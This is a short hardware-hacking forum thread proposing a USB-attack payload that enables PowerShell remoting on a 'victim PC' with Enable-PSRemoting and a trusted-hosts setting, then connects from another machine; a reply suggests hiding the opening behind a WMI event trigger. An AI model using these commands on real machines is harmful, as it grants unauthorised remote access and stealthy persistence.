Jump to content

Remote Exec via PS (Payload Idea)


Dave-ee Jones
 Share

Recommended Posts

Hoi!

So here's a quick payload idea..

Plug BB into victim PC and enable remote connection on PS:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trusthosts "172.16.16.*"

Head to another PC and launch remote PS commands (your laptop on the same network, maybe?):

Enter-PSSession -ComputerName "George"

Might work on the payload tomorrow or something, get a quick version going. I just posted to see what others could come up with or just have a Devil's Advocate try and stump me (probably not hard in this case).

Link to comment
Share on other sites

Hmm, been awhile since I enable PSRemoting.  I do not recall but after enabling does the machine usually require a reboot?

If not, there is actually a even more hidden idea.  WMI trigger to enable psremoting and allow your IP when some external event that you can control happens on the network or with a service on the machine.

 

Use bunny to create trigger and now there is no psremote port open.  Trigger WMI event from another machine so psremoting is enabled and then connect.  When done you may can have an event to shut it back down too.  

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...